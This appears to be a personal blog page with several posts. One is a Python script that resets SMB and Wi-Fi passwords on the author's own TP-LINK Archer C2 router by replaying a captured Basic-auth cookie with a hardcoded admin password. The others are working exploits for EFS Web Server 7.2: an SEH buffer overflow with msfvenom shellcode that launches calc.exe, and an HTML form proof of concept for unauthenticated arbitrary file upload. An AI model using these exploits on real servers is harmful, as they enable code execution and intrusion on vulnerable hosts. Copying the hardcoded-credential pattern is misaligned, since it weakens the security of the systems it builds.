[Project] Small temporarily office network Part 3

[Tool] Change TP-LINK AC750 SMB User Password Without login to Admin page

This project is base on my previous project [Project] Small temporarily office network Part 2
I spend some time and create this tool which allows normal none-tech users can just run the program and change the smb user password easily.

First I have to analyst the login process and things ..etc

this is what i got from wireshark, the router use cookie as an authorization identity
# YWRtaW46YWRtaW42MjM0IQ== –> admin:admin6234!
# the router check cookie value to auth :/ and “admin6234!” is my pre-set password

ac750

Convert my python script into .exe executable file

1 Download  https://bootstrap.pypa.io/get-pip.py and run it. so it will install pip for you
2. install pyinstaller   ---> open cmd and type:  pip install pyinstaller
3. change to pyinstaller folder   ---> cd C:\Python27\Scripts
4. convert file with custom icon  -> pyinstaller --onefile --icon=my.ico --clean C:\Python27\update.py

Result:


----------------------------------------
[1]. Change Document Password
[2]. Change Audio Password
----------------------------------------



Please Enter Your Choice: 2



Audio new password ==>  h4Mzit2i6u




[*] Connecting to Default Gateway: 192.168.0.1
[*] Successfully Connected..
[*] Request has been sent!

Press close to Exit

🙂



#!/usr/bin/python

##################################
#   2017/6/29  Chako
#
#   Description: allow users to change router's smb passwd 
#                without login to router's admin page
#   
#    Router Model: TP-LINK AC750 Wireless Dual Band Gigabit Router
#    Model No. Archer C2
#
##################################
 
 
import socket
import os
import sys
import string
import random

Host = "192.168.0.1"
Port = 80
PasswordSize = 10
Password = ""
Account  = ""
Chars = string.letters + string.digits


print "\n\n"
print "----------------------------------------"
print "[1]. Chnage Document Password"
print "[2]. Chnage Audio Password"
print "----------------------------------------"
print "\n\n" 
 

var = raw_input("Please Enter Your Choice: ")
print "\n\n"

if var == "1":
    Password = "".join((random.choice(Chars)) for x in range(PasswordSize))
    Account = "2"
    print "Document new password ==>  " + Password
    print "\n\n\n"
elif var == "2":
    Password = "".join((random.choice(Chars)) for x in range(PasswordSize))
    Account = "3"
    print "Audio new password ==>  " + Password
    print "\n\n\n"


# YWRtaW46YWRtaW42MjM0IQ==    <base64> --> admin:admin6234!
# the router check cookie value to auth :/   and "admin6234!" is my pre-set password
request = "POST /cgi?2 HTTP/1.1\r\n"
request += "Host: " + Host + "\r\n"
request += "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0\r\n"
request += "Accept: */*\r\n"
request += "Accept-Language: en-US,en;q=0.5\r\n"
request += "Accept-Encoding: gzip, deflate\r\n"
request += "Referer: http://" + Host + "/mainFrame.htm \r\n"
request += "Content-Type: text/plain\r\n"
request += "Content-Length: 70\r\n"
request += "Cookie: Authorization=Basic YWRtaW46YWRtaW42MjM0IQ==\r\n"
request += "Connection: keep-alive\r\n\r\n"
request += "[USER_ACCOUNT#" + Account + ",0,0,0,0,0#0,0,0,0,0,0]0,1\r\n"
request += "password=" + Password + "\r\n"
#print request+"\n\n\n"

 
print "[*] Connecting to Default Gateway: " + Host


 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
 
try:
    connect=s.connect((Host, Port))
    print "[*] Successfully Connected.."
except:
    print "[!] " + Host + " didn't respond\n"
    sys.exit(0)
 
 

s.send(request + "\r\n\r\n")
print "[*] Request has been sent!\n"
s.close()


k=input("Press close to Exit") 


🙂

—————————————————————————————-

UPDATE: 2017/6/29
add function let allow users to change network connection password

network_ac750

UPDATE: 2017/6/30
Was trying to use Python + Qt to create GUI however it has some compatible problem when I was trying to
convert .py to .exe. so i end up just build whole thing again in vb.net

Result:
vbupdate



#!/usr/bin/python

#!/usr/bin/python

##################################
#   2017/6/29  Chako
#
#   Description: allow users to change router's smb passwd 
#                without login to router's admin page
#   
#    Router Model: TP-LINK AC750 Wireless Dual Band Gigabit Router
#    Model No. Archer C2
#
##################################
 
 
import socket
import os
import sys
import string
import random

Host = "192.168.0.1"
Port = 80
PasswordSize = 10
Password = ""
Account  = ""
Network  = ""
Chars = string.letters + string.digits


print "\n\n"
print "----------------------------------------"
print "[1]. Change Document Password"
print "[2]. Change Audio Password"
print "[3]. Change Network Password (Network2.4G)"
print "[4]. Change Network Password (Network5G)"
print "----------------------------------------"
print "\n\n" 
 

var = raw_input("Please Enter Your Choice: ")
print "\n\n"

if var == "1":
    Password = "".join((random.choice(Chars)) for x in range(PasswordSize))
    Account = "2"
    print "Document new password ==>  " + Password
    print "\n\n\n"
elif var == "2":
    Password = "".join((random.choice(Chars)) for x in range(PasswordSize))
    Account = "3"
    print "Audio new password ==>  " + Password
    print "\n\n\n"
elif var == "3":
    Password = "".join((random.choice(Chars)) for x in range(PasswordSize))
    Network = "1"
    print "Network (Network2.4G) new password ==>  " + Password
    print "\n\n\n"
elif var == "4":
    Password = "".join((random.choice(Chars)) for x in range(PasswordSize))
    Network = "2"
    print "Network (Network5G) new password ==>  " + Password
    print "\n\n\n"



# YWRtaW46YWRtaW42MjM0IQ==    <base64> --> admin:admin6234!
# the router check cookie value to auth :/   and "admin6234!" is my pre-set password
if var == "1" or var == "2":
    request = "POST /cgi?2 HTTP/1.1\r\n"
    request += "Host: " + Host + "\r\n"
    request += "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0\r\n"
    request += "Accept: */*\r\n"
    request += "Accept-Language: en-US,en;q=0.5\r\n"
    request += "Accept-Encoding: gzip, deflate\r\n"
    request += "Referer: http://" + Host + "/mainFrame.htm \r\n"
    request += "Content-Type: text/plain\r\n"
    request += "Content-Length: 70\r\n"
    request += "Cookie: Authorization=Basic YWRtaW46YWRtaW42MjM0IQ==\r\n"
    request += "Connection: keep-alive\r\n\r\n"
    request += "[USER_ACCOUNT#" + Account + ",0,0,0,0,0#0,0,0,0,0,0]0,1\r\n"
    request += "password=" + Password + "\r\n"
elif var == "3" or var == "4":
    request = "POST /cgi?2 HTTP/1.1\r\n"
    request += "Host: " + Host + "\r\n"
    request += "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0\r\n"
    request += "Accept: */*\r\n"
    request += "Accept-Language: en-US,en;q=0.5\r\n"
    request += "Accept-Encoding: gzip, deflate\r\n"
    request += "Referer: http://" + Host + "/mainFrame.htm \r\n"
    request += "Content-Type: text/plain\r\n"
    request += "Content-Length: 197\r\n"
    request += "Cookie: Authorization=Basic YWRtaW46YWRtaW42MjM0IQ==\r\n"
    request += "Connection: keep-alive\r\n\r\n"
    request += "[LAN_WLAN#1," + Network + ",0,0,0,0#0,0,0,0,0,0]0,5\r\n"
    request += "BeaconType=11i\r\n"
    request += "IEEE11iAuthenticationMode=PSKAuthentication\r\n"
    request += "IEEE11iEncryptionModes=AESEncryption\r\n"
    request += "X_TP_PreSharedKey=" + Password + "\r\n"
    request += "X_TP_GroupKeyUpdateInterval=0\r\n"
	
#print request+"\n\n\n"

 
print "[*] Connecting to Default Gateway: " + Host


 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
 
try:
    connect=s.connect((Host, Port))
    print "[*] Successfully Connected.."
except:
    print "[!] " + Host + " didn't respond\n"
    sys.exit(0)
 
 

s.send(request + "\r\n\r\n")
print "[*] Request has been sent!\n"
s.close()


end=raw_input("Press Close to Exit") 
print "\n\n"

EFS Web Server 7.2 – Local Buffer Overflow(SEH)



#!/usr/bin/python

##################################
#   2017/6/17  Chako
#  
#   EFS Web Server 7.2 - Local Buffer Overflow(SEH)
#   Tested on: Windows XP SP3 EN (DEP Off)
#   Software Link: https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe
#
#   Description:
#   When importing a large user account file on to EFS Web Server 7.2
#   will trigger the vuln.
##################################

import struct


# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v Shellcode -f python
Shellcode =  ""
Shellcode += "\x89\xe5\xdb\xd8\xd9\x75\xf4\x5f\x57\x59\x49\x49"
Shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
Shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
Shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
Shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
Shellcode += "\x59\x6c\x59\x78\x4d\x52\x75\x50\x57\x70\x43\x30"
Shellcode += "\x55\x30\x6d\x59\x4b\x55\x55\x61\x6f\x30\x53\x54"
Shellcode += "\x6e\x6b\x56\x30\x30\x30\x6c\x4b\x53\x62\x44\x4c"
Shellcode += "\x6c\x4b\x36\x32\x72\x34\x4e\x6b\x34\x32\x75\x78"
Shellcode += "\x44\x4f\x6d\x67\x50\x4a\x47\x56\x34\x71\x6b\x4f"
Shellcode += "\x6e\x4c\x37\x4c\x31\x71\x53\x4c\x57\x72\x56\x4c"
Shellcode += "\x55\x70\x7a\x61\x48\x4f\x44\x4d\x73\x31\x78\x47"
Shellcode += "\x39\x72\x39\x62\x63\x62\x71\x47\x4e\x6b\x66\x32"
Shellcode += "\x46\x70\x6c\x4b\x51\x5a\x37\x4c\x4c\x4b\x62\x6c"
Shellcode += "\x46\x71\x53\x48\x58\x63\x32\x68\x57\x71\x38\x51"
Shellcode += "\x70\x51\x6e\x6b\x62\x79\x71\x30\x66\x61\x58\x53"
Shellcode += "\x4e\x6b\x57\x39\x34\x58\x39\x73\x67\x4a\x47\x39"
Shellcode += "\x4c\x4b\x50\x34\x4e\x6b\x36\x61\x39\x46\x45\x61"
Shellcode += "\x6b\x4f\x4c\x6c\x6b\x71\x78\x4f\x66\x6d\x56\x61"
Shellcode += "\x6b\x77\x34\x78\x4b\x50\x74\x35\x6b\x46\x37\x73"
Shellcode += "\x33\x4d\x38\x78\x67\x4b\x43\x4d\x67\x54\x43\x45"
Shellcode += "\x59\x74\x63\x68\x4c\x4b\x70\x58\x46\x44\x67\x71"
Shellcode += "\x6b\x63\x72\x46\x6c\x4b\x34\x4c\x52\x6b\x6c\x4b"
Shellcode += "\x33\x68\x37\x6c\x55\x51\x49\x43\x4c\x4b\x55\x54"
Shellcode += "\x4e\x6b\x63\x31\x6a\x70\x6b\x39\x53\x74\x35\x74"
Shellcode += "\x57\x54\x73\x6b\x61\x4b\x53\x51\x50\x59\x33\x6a"
Shellcode += "\x62\x71\x79\x6f\x4d\x30\x51\x4f\x33\x6f\x33\x6a"
Shellcode += "\x6c\x4b\x37\x62\x5a\x4b\x6c\x4d\x31\x4d\x71\x7a"
Shellcode += "\x57\x71\x4e\x6d\x4f\x75\x6c\x72\x43\x30\x77\x70"
Shellcode += "\x73\x30\x50\x50\x42\x48\x56\x51\x4e\x6b\x52\x4f"
Shellcode += "\x4e\x67\x6b\x4f\x68\x55\x4f\x4b\x48\x70\x6f\x45"
Shellcode += "\x6c\x62\x50\x56\x52\x48\x4d\x76\x4a\x35\x4f\x4d"
Shellcode += "\x6d\x4d\x49\x6f\x58\x55\x55\x6c\x33\x36\x61\x6c"
Shellcode += "\x74\x4a\x6b\x30\x69\x6b\x4d\x30\x74\x35\x54\x45"
Shellcode += "\x4d\x6b\x47\x37\x62\x33\x72\x52\x70\x6f\x32\x4a"
Shellcode += "\x63\x30\x56\x33\x59\x6f\x4e\x35\x33\x53\x63\x51"
Shellcode += "\x52\x4c\x33\x53\x44\x6e\x73\x55\x72\x58\x65\x35"
Shellcode += "\x77\x70\x41\x41"




#SEH record (nseh field) at 0x0012b318 overwritten with normal pattern (offset 2563)
Junk = "\x41" * 2563

nSEH = "\xEB\x0F\x90\x90"

# 0x10012f3b : pop esi # pop ebx # ret  | ascii {PAGE_EXECUTE_READ} [ImageLoad.dll] 
# ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = struct.pack("<L", 0x10012f3b)


NOP = "\x90" * 10

BoF = Junk + nSEH + SEH + NOP + Shellcode + NOP


print len(BoF)
f = open ("exploit.txt", "w")
f.write(BoF)
f.close()


import_userefsws

EFS Web Server 7.2 Unrestricted File Upload

##################################
# 2017/6/15 Chako
#
# EFS Web Server 7.2 Unrestricted File Upload
# Software Link: https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe
##################################

EFS Web Server 7.2 allows unauthorized users to upload malicious files

[Exploit]

// action="http://target_host/disk_c/vfolders
// </script><input size="20" name="upload_author" value="Admin" type="hidden"> 
// have to know the user name by Default "Admin"



<form action="http://192.168.136.129/disk_c/vfolders" name="post" onsubmit="return input(this)" enctype="multipart/form-data" method="post">
<input name="uploadid" id="uploadid" value="34533689" type="hidden">
          <center>
            <a name="reply"></a> 
            <table class="forumline" cellpadding="6" width="479">
              <tbody><tr bgcolor="#8080A6"> 
                <td bgcolor="#eff2f8" height="319"> 
                  <center>

<script language="JavaScript">
<!--
document.write('<input type="hidden" size="20" name="upload_author" Value="'+ReadCookie("UserID")+'">');
// -->
</script><input size="20" name="upload_author" value="Admin" type="hidden"> 
<script language="JavaScript">
<!--
document.write('<input type="hidden" size="20" name="upload_passwd" Value="'+ReadCookie("PassWD")+'">');
// --></script><input size="20" name="upload_passwd" value="829700" type="hidden"> 

                    <table cellpadding="0" border="0" width="437">
                      <tbody><tr> 
                        <td colspan="2" height="63"> <span class="bgen">Description:</span> <br> 
                          <input name="upload_title" id="upload_title" size="50" value="dd" type="text">
                          </td>
                      </tr>
                      <tr> 
                        <td colspan="2"><span class="bgen">File:</span> <br>
                          <input name="UploadedFile" id="UploadedFile" size="50" type="file">
                          <br> </td>
                      </tr>
                      <tr>
</tr>
<tr>
 
                        <td colspan="2" height="40"><font size="2" face="Arial, Helvetica, sans-serif" color="#FFFFFF"> 
                          <input name="Upload" class="button" value="Upload" type="submit">
                          </font> 

                      </td>
                      </tr>
                    </tbody></table>
                  </center></td>
              </tr>
            </tbody></table>
            
          </center>
        </form> 
		[/Exploit]